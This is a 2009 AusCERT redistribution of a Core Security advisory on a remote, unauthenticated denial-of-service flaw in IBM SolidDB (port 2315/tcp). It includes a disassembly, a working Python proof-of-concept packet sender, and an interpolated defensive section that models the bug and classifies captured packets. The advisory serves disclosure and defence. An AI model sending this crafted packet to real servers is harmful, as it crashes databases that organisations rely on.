-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                              ESB-2009.1547.2
               IBM SolidDB invalid error code vulnerability
                             19 November 2009

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           IBM SolidDB Server 6.30.0.29
                   IBM SolidDB Server 6.30.0.33
Publisher:         Core Security Technologies
Operating System:  AIX
                   HP-UX
                   Red Hat
                   SUSE
                   Solaris
                   Windows
Impact/Access:     Denial of Service -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2009-3840 CVE-2009-3977 

Reference:         ESB-2009.1546

Original Bulletin: 
   http://www.coresecurity.com/content/ibm-soliddb-errorcode-dos

Revision History:  November 19 2009: Added CVE reference
                   November 19 2009: Initial Release

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

       IBM SolidDB invalid error code vulnerability



1. *Advisory Information*

Title: IBM SolidDB invalid error code vulnerability
Advisory Id: CORE-2009-1027
Advisory URL: http://www.coresecurity.com/content/ibm-soliddb-errorcode-dos
Date published: 2009-11-18
Date of last update: 2009-11-18
Vendors contacted: IBM
Release mode: Forced release



2. *Vulnerability Information*

Class: External Initialization of Trusted Variables [CWE-454]
Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-3840



3. *Vulnerability Description*

SolidDB is an in-memory relational database from IBM with over 3,000,000
deployments [1]. It is used as an embedded database by independent
software vendors of enterprise applications, telecommunications and
embedded software and systems. IBM reports SolidDB as being used in
mission-critical applications from Cisco, HP, Alcatel and Nokia Siemens.
The in-memory database is also used as a core component of IBM SolidDB
Universal Cache, a performance improvement application for relational
databases such as DB2, Microsoft SQL Server, Oracle and Informix.

A remotely exploitable vulnerability was found in the database server
core component. Exploitation of this bug does not require authentication
and leads to a remotely triggered denial of service of the database
service. It is not likely that this bug could be otherwise exploited to
compromise systems running vulnerable versions of SolidDB. Core's
security advisory CORE-2009-0814 refers to this vulnerability in HP
OpenView Network Node Manager [2].


4. *Vulnerable packages*

   . IBM SolidDB Server 6.30.0.29
   . IBM SolidDB Server 6.30.0.33
   . Other versions may be vulnerable but were not tested by Core.


5. *Non-vulnerable packages*

   . IBM SolidDB Server 6.30.0.37


6. *Vendor Information, Solutions and Workarounds*

IBM has issued the SolidDB and SolidDB Universal Cache 6.3 Fix Pack 3
which addresses this problem. It is available for download from the
vendor's Fix Central site:

http://www-01.ibm.com/support/docview.wss?rs=0&q1=solidb&uid=swg24024510

Blocking or restricting network access to port 2315/tcp will prevent
exploitation of the bug, but it may negatively affect the operation of
any application embedding or using the SolidDB engine.


7. *Credits*

This vulnerability was discovered and researched by Damian Frizza from
Core Security Technologies.


8. *Technical Description / Proof of Concept Code*

IBM SolidDB server listens for and accepts remote connections on port
2315/tcp. The service is implemented by 'solid.exe', which is started
automatically on boot. For certain transactions, upon receiving a packet
from the network the service attempts to determine and display an
error code string based on an error code number specified in the packet.
By sending a specially crafted packet with an invalid error code number,
it is possible to trigger an exception that forces abnormal termination
of the service. It is unlikely that the bug could be exploited for
anything other than a remote denial of service.

The following code excerpt explains the problem:

/-----
0061611F   0FB65424 02      MOVZX EDX,BYTE PTR SS:[ESP+2]
00616124   0FBF4C24 03      MOVSX ECX,WORD PTR SS:[ESP+3]
00616129   83F9 FF          CMP ECX,-1
0061612C   0FBF4424 05      MOVSX EAX,WORD PTR SS:[ESP+5]
00616131   8956 10          MOV DWORD PTR DS:[ESI+10],EDX
00616134   8B5424 07        MOV EDX,DWORD PTR SS:[ESP+7]
00616138   894E 14          MOV DWORD PTR DS:[ESI+14],ECX
0061613B   8946 18          MOV DWORD PTR DS:[ESI+18],EAX
0061613E   8956 0C          MOV DWORD PTR DS:[ESI+C],EDX
00616141   7D 09            JGE SHORT solid.0061614C
00616143   83F8 FF          CMP EAX,-1
00616146   7D 04            JGE SHORT solid.0061614C
00616148   3BC8             CMP ECX,EAX
0061614A   74 05            JE SHORT solid.00616151
0061614C   B8 01000000      MOV EAX,1
00616151   83C4 0C          ADD ESP,0C
00616154   C3               RETN

- - -----/


The code above checks for an error condition based on the value of an
Error Code field in the inbound network packet. An error condition is
explicitly handled if the Error Code value is less than or equal to -1,
in which case a MessageBox with a corresponding descriptive error string
is presented to the user. However, by crafting a packet with any
negative value in the Error Code field other than -1, the lookup for
the corresponding error string fails, triggering a non-recoverable
error and thus terminating the server process.

The following python code can be used to reproduce the bug:

/-----
#!python
# Python 2 script as published: struct.pack() returns str, so the packed
# fields and the trailing literal concatenate directly.
import socket
import struct

#maxlen 0xA
a =  struct.pack('<b', 2)
a += struct.pack('<H', 0)
a += struct.pack('<H',0xFEFF)   # error code word: 0xFEFF is -257 as a signed 16-bit value
a += struct.pack('<H',0xFEFF)   # second copy; both words are below -1 and equal, so the
                                # check above returns the code instead of 1
a += "1234"

target_ip = 'X.X.X.X'           # placeholder address, as published

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect ((target_ip, 2315))

s.send(a)
s.close()

- - -----/
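
The following is an added example, not code from Core's advisory or from IBM. It models in Python the compare chain shown in the disassembly above, the table lookup that made an unknown error code fatal, and the bounds-checked lookup a defender would expect instead, together with a small triage helper for classifying captured 2315/tcp payloads. It assumes that the 11-byte packet built by the proof of concept is laid out in memory starting at [ESP+0], so the listing's reads at [ESP+3] and [ESP+5] correspond to packet offsets 3 and 5; the error-string table contents are constructed, since the real table is not on the page.

```python
import struct

# Added example (not Core's or IBM's code). Assumption: the proof-of-concept
# packet occupies [ESP+0..ESP+10], so the listing's MOVSX reads at [ESP+3] and
# [ESP+5] are the two 16-bit words at packet offsets 3 and 5.

PACKET_LEN = 11


def error_code_from_packet(pkt):
    """Return what the routine in the listing leaves in EAX: 1 for 'no error',
    otherwise the sign-extended error code the caller turns into a string."""
    if len(pkt) < PACKET_LEN:
        raise ValueError("short packet")
    code_a = struct.unpack_from('<h', pkt, 3)[0]   # MOVSX ECX, WORD PTR [ESP+3]
    code_b = struct.unpack_from('<h', pkt, 5)[0]   # MOVSX EAX, WORD PTR [ESP+5]
    if code_a >= -1:                               # CMP ECX,-1 / JGE -> MOV EAX,1
        return 1
    if code_b >= -1:                               # CMP EAX,-1 / JGE -> MOV EAX,1
        return 1
    if code_a != code_b:                           # CMP ECX,EAX / JE skips MOV EAX,1
        return 1
    return code_b                                  # EAX still holds the negative word


# Constructed stand-in for the server's error-string table. The real table is
# not on the page; the point is that it cannot cover every negative 16-bit value.
ERROR_STRINGS = {
    -2: "constructed: connection refused",
    -3: "constructed: protocol error",
}


def describe_unchecked(code):
    """Model of the original behaviour: an unknown key raises, and in the
    server that unhandled condition terminated the process."""
    return ERROR_STRINGS[code]


def describe_checked(code):
    """Hardened form: a wire-supplied value is never used as an unchecked
    index into a table; unknown codes get a generic message."""
    return ERROR_STRINGS.get(code, "unknown error code %d" % code)


def classify_packet(pkt):
    """Triage helper for captured 2315/tcp payloads: 'ok', 'known-error', or
    'invalid-error-code' (the pattern this advisory describes)."""
    code = error_code_from_packet(pkt)
    if code == 1:
        return "ok"
    return "known-error" if code in ERROR_STRINGS else "invalid-error-code"


# Constructed sample payloads in the proof-of-concept layout
# (byte, word, two signed error-code words, four trailing bytes).
BENIGN_PACKET = struct.pack('<bHhh', 2, 0, 0, 0) + b"1234"          # words >= -1 -> EAX=1
KNOWN_ERROR_PACKET = struct.pack('<bHhh', 2, 0, -2, -2) + b"1234"   # code present in table
TRIGGER_PACKET = struct.pack('<bHhh', 2, 0, -257, -257) + b"1234"   # 0xFEFF words, as in the advisory
MISMATCH_PACKET = struct.pack('<bHhh', 2, 0, -2, -3) + b"1234"      # both negative but unequal -> EAX=1

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN_PACKET), ("known", KNOWN_ERROR_PACKET),
                      ("trigger", TRIGGER_PACKET), ("mismatch", MISMATCH_PACKET)):
        code = error_code_from_packet(pkt)
        print("%-8s code=%-5d class=%s" % (name, code, classify_packet(pkt)))
        if code != 1:
            print("         checked lookup:", describe_checked(code))
```

Running the block shows that only a packet whose two error-code words are equal and both below -1 reaches the string lookup; `describe_unchecked` then raises on any code outside the table, which is the failure the advisory describes, while `describe_checked` degrades to a generic message. The same field extraction can be run over captured payloads to flag the invalid-error-code pattern on port 2315/tcp.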



9. *Report Timeline*

. 2009-10-23:
Core Security Technologies sends an email to the IBM AIX Security team
requesting a security point of contact to report security bugs in
SolidDB and asks whether the report should instead be sent to SolidDB
security.

. 2009-10-27:
IBM AIX Security replies indicating that they forwarded the request to
SolidDB's development team.

. 2009-10-27:
SolidDB's QA Manager contacts Core, acknowledging the request originally
sent to AIX Security and indicating that, although there is no
established formal channel to report security bugs in SolidDB, the report
could be sent directly to him.

. 2009-10-27:
Core Security Technologies replies stating that a draft technical
document describing the problem is being prepared and will be sent to
SolidDB as soon as it is available. In the meantime, Core indicates that
a third-party vendor may have already reported the problem and requests
confirmation that said vendor recently reported a remote denial of
service vulnerability in the database service.

. 2009-11-10:
Core sends the advisory with full technical details to the SolidDB team
and informs them that publication is set for December 7th, 2009, and
that the date is subject to change if publication of patches is
coordinated for a date agreed upon between Core and IBM SolidDB. Core
requests confirmation that a SolidDB OEM customer [2] has already
reported the bug and received patches.

. 2009-11-17:
IBM SolidDB publishes patches to the vulnerable products.

. 2009-11-18:
Advisory CORE-2009-1027 published.



10. *References*

[1] IBM SolidDB
http://www-01.ibm.com/software/data/soliddb/
[2] HP Openview NNM 7.53 Invalid DB Error Code vulnerability
http://www.coresecurity.com/content/openview_nnm_internaldb_dos


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAksEO4YACgkQyNibggitWa1laACgik+qyd+ZQVgVPiERCKXVGCu/
kPgAoKAmw/r3PKYxfPb9Q2RC4Bzc8tbh
=mnrD
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

If you believe that your computer system has been compromised or attacked in 
any way, we encourage you to let us know by completing the secure National IT 
Incident Reporting Form at:

        http://www.auscert.org.au/render.html?it=3192

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iD8DBQFLBM0KNVH5XJJInbgRAlHtAJwNuKSUABi+Rd1y/b9eAhu49ONVJQCghrNn
GwRcFwyZSaKvgQOYhoL7GXM=
=kwNa
-----END PGP SIGNATURE-----